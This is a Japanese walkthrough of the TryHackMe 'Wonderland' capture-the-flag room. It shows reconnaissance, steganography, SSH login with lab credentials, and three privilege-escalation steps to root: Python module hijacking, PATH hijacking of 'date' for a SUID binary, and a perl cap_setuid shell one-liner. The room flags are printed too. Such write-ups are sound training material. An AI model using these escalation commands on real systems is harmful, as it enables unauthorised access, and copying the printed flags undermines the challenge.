概要
TryHackMe「Wonderland」のWalkthroughです。
Task1
Q1.Obtain the flag in user.txt
ポートスキャンを実行します。
$ nmap -Pn -T4 -sVC -p- 10.201.37.41 -oN nmap_result
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
| 256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_ 256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
ポートの稼働状況が分かりました。
| ポート | サービス | バージョン |
|---|---|---|
| 22 | ssh | OpenSSH 7.6p1 |
| 80 | http | Golang net/http server |
80番ポートにアクセスします。
ディレクトリスキャンをすると、/imgと/rを発見しました。
$ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -u http://10.201.37.41/FUZZ -recursion -recursion-depth 1 -ic -c
img [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 174ms]
r [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 171ms]
/rにアクセスすると、続きのページが表示されました。
/r配下をさらにスキャンすると、/r/aを発見しました。
$ dirsearch -u http://10.201.37.41/r
[08:58:10] 301 - 0B - /r/a -> a/
/r/aにアクセスすると、さらに続きのページが表示されました。
/r/a配下をさらに列挙すると、/r/a/bを発見しました。
$ dirsearch -u http://10.201.37.41/r/a
[09:00:08] 301 - 0B - /r/a/b -> b/
/r/a/bにもストーリーが続いていました。
ルームタイトルなどから、/r/a/b/b/i/t/とパスが予測できたのでアクセスすると、予想通りページが表示されました。
これ以上、ディレクトリスキャンで情報を得られなかったので、Webページに使用されていた画像に目を向けます。
トップページに使用されていた画像をダウンロードします。
$ wget http://10.201.37.41/img/white_rabbit_1.jpg
--2025-09-14 09:13:00-- http://10.201.37.41/img/white_rabbit_1.jpg
Connecting to 10.201.37.41:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1993438 (1.9M) [image/jpeg]
Saving to: ‘white_rabbit_1.jpg’
white_rabbit_1.jpg 100%[===================================================================>] 1.90M 254KB/s in 11s
2025-09-14 09:13:11 (185 KB/s) - ‘white_rabbit_1.jpg’ saved [1993438/1993438]
white_rabbit_1.jpgのステガノグラフィーを調べると、hint.txtが隠されていました。
$ steghide extract -sf ./white_rabbit_1.jpg
Enter passphrase:
wrote extracted data to "hint.txt".
hint.txtには/r/a/b/b/i/tの事が記載されていました。
$ cat hint.txt
follow the r a b b i t
/r/a/b/b/i/t/を再度見ると、ソースコードにalice:HowDothTheLittleCrocodileImproveHisShiningTailと記載を発見しました。
得られた認証情報でSSH接続に成功しました。
$ ssh alice@10.201.37.41
alice@wonderland:~$
root.txtがありましたが、権限がありません。
alice@wonderland:~$ cat root.txt
cat: root.txt: Permission denied
ヒントを見ると、Everything is upside down here.とあり逆さまになっているようです。
/root/user.txtを見ると、ユーザーフラグを入手できました。
alice@wonderland:~$ cat /root/user.txt
thm{"Curiouser and curiouser!"}
A.thm{"Curiouser and curiouser!"}
Q2.Escalate your privileges, what is the flag in root.txt?
aliceアカウントでは、/home/alice/walrus_and_the_carpenter.pyをrabbitアカウント権限での実行が許可されていました。
alice@wonderland:~$ sudo -l
[sudo] password for alice:
Matching Defaults entries for alice on wonderland:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alice may run the following commands on wonderland:
(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
/home/alice/walrus_and_the_carpenter.pyを確認すると、ランダムにポエムを出力処理が書かれています。
walrus_and_the_carpenter.py
import random
poem = """The sun was shining on the sea,
Shining with all his might:
He did his very best to make
The billows smooth and bright —
And this was odd, because it was
The middle of the night.
The moon was shining sulkily,
Because she thought the sun
Had got no business to be there
After the day was done —
"It’s very rude of him," she said,
"To come and spoil the fun!"
The sea was wet as wet could be,
The sands were dry as dry.
You could not see a cloud, because
No cloud was in the sky:
No birds were flying over head —
There were no birds to fly.
The Walrus and the Carpenter
Were walking close at hand;
They wept like anything to see
Such quantities of sand:
"If this were only cleared away,"
They said, "it would be grand!"
"If seven maids with seven mops
Swept it for half a year,
Do you suppose," the Walrus said,
"That they could get it clear?"
"I doubt it," said the Carpenter,
And shed a bitter tear.
"O Oysters, come and walk with us!"
The Walrus did beseech.
"A pleasant walk, a pleasant talk,
Along the briny beach:
We cannot do with more than four,
To give a hand to each."
The eldest Oyster looked at him.
But never a word he said:
The eldest Oyster winked his eye,
And shook his heavy head —
Meaning to say he did not choose
To leave the oyster-bed.
But four young oysters hurried up,
All eager for the treat:
Their coats were brushed, their faces washed,
Their shoes were clean and neat —
And this was odd, because, you know,
They hadn’t any feet.
Four other Oysters followed them,
And yet another four;
And thick and fast they came at last,
And more, and more, and more —
All hopping through the frothy waves,
And scrambling to the shore.
The Walrus and the Carpenter
Walked on a mile or so,
And then they rested on a rock
Conveniently low:
And all the little Oysters stood
And waited in a row.
"The time has come," the Walrus said,
"To talk of many things:
Of shoes — and ships — and sealing-wax —
Of cabbages — and kings —
And why the sea is boiling hot —
And whether pigs have wings."
"But wait a bit," the Oysters cried,
"Before we have our chat;
For some of us are out of breath,
And all of us are fat!"
"No hurry!" said the Carpenter.
They thanked him much for that.
"A loaf of bread," the Walrus said,
"Is what we chiefly need:
Pepper and vinegar besides
Are very good indeed —
Now if you’re ready Oysters dear,
We can begin to feed."
"But not on us!" the Oysters cried,
Turning a little blue,
"After such kindness, that would be
A dismal thing to do!"
"The night is fine," the Walrus said
"Do you admire the view?
"It was so kind of you to come!
And you are very nice!"
The Carpenter said nothing but
"Cut us another slice:
I wish you were not quite so deaf —
I’ve had to ask you twice!"
"It seems a shame," the Walrus said,
"To play them such a trick,
After we’ve brought them out so far,
And made them trot so quick!"
The Carpenter said nothing but
"The butter’s spread too thick!"
"I weep for you," the Walrus said.
"I deeply sympathize."
With sobs and tears he sorted out
Those of the largest size.
Holding his pocket handkerchief
Before his streaming eyes.
"O Oysters," said the Carpenter.
"You’ve had a pleasant run!
Shall we be trotting home again?"
But answer came there none —
And that was scarcely odd, because
They’d eaten every one."""
for i in range(10):
line = random.choice(poem.split("\n"))
print("The line was:\t", line)
ファイルの編集権限はないので、import randomに注目します。
importでモジュールを読み込む順番を確認すると、スクリプトのディレクトリを最初に参照しています。
''はpythonスクリプトのあるディレクトリを意味しています。
>>> import sys
>>> print(sys.path)
['', '/usr/lib/python36.zip', '/usr/lib/python3.6', '/usr/lib/python3.6/lib-dynload', '/usr/local/lib/python3.6/dist-packages', '/usr/lib/python3/dist-packages']
シェルを起動するrandomモジュールを新たに作成します。
alice@wonderland:~$ cat random.py
import os
os.system('/bin/bash')
rabbit権限で/home/alice/walrus_and_the_carpenter.pyを実行すると、rabbitのシェルを起動できました。
alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
rabbit@wonderland:~$ whoami
rabbit
/home/rabbitを確認すると、SUIDが設定されたteaPartyプログラムを発見しました。
rabbit@wonderland:/home/rabbit$ ls -la
total 40
drwxr-x--- 2 rabbit rabbit 4096 May 25 2020 .
drwxr-xr-x 6 root root 4096 May 25 2020 ..
lrwxrwxrwx 1 root root 9 May 25 2020 .bash_history -> /dev/null
-rw-r--r-- 1 rabbit rabbit 220 May 25 2020 .bash_logout
-rw-r--r-- 1 rabbit rabbit 3771 May 25 2020 .bashrc
-rw-r--r-- 1 rabbit rabbit 807 May 25 2020 .profile
-rwsr-sr-x 1 root root 16816 May 25 2020 teaParty
teaPartyを実行すると、メッセージが出力されました。
$ ./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Sun, 14 Sep 2025 14:32:22 +0000
Ask very nicely, and I will give you some tea while you wait for him
Segmentation fault (core dumped)
teaPartyのデータを確認すると、/bin/echoやdateコマンドを実行していると分かりました。
$ cat teaParty
(省略)
Welcome to the tea party!
The Mad Hatter will be here soon./bin/echo -n 'Probably by ' && date --date='next hour' -RAsk very nicely, and I will give you some tea while you wait for himSegmentation fault (core dumped)
dateコマンドの実行は絶対パスで指定されていないので、任意のdateプログラムを実行し権限昇格出来そうです。
シェルを起動するdateを作成し、環境変数を設定します。
rabbit@wonderland:/home/rabbit$ echo "/bin/bash" > date
rabbit@wonderland:/home/rabbit$ chmod 777 date
rabbit@wonderland:/home/rabbit$ export PATH=/home/rabbit:$PATH
rabbit@wonderland:/home/rabbit$ echo $PATH
/home/rabbit:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
teaPartyを実行すると、hatterでシェルを起動できました。
rabbit@wonderland:/home/rabbit$ ./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$
hatter@wonderland:/home/rabbit$ whoami
hatter
/home/hatter/password.txtからパスワードを得られました。
hatter@wonderland:/home/rabbit$ cat /home/hatter/password.txt
WhyIsARavenLikeAWritingDesk?
これはhatterのSSH接続用パスワードでした。
$ ssh hatter@10.201.37.41
hatter@wonderland:~$
linpeasを実行すると、capabilitiesの項目で権限昇格出来そうです。
hatter@wonderland:/tmp$ ./linpeas.sh
╔══════════╣ Capabilities
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#capabilities
══╣ Current shell capabilities
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
perlのcapabilitiesを使用した権限昇格のテクニックが見つかりました。
サイトに記載されているコマンドを実行すると、root権限を取得できました。
hatter@wonderland:/tmp$ /usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
# whoami
root
/home/alice/root.txtからルートフラグを入手できました。
# cat /home/alice/root.txt
thm{Twinkle, twinkle, little bat! How I wonder what you’re at!}
A.thm{Twinkle, twinkle, little bat! How I wonder what you’re at!}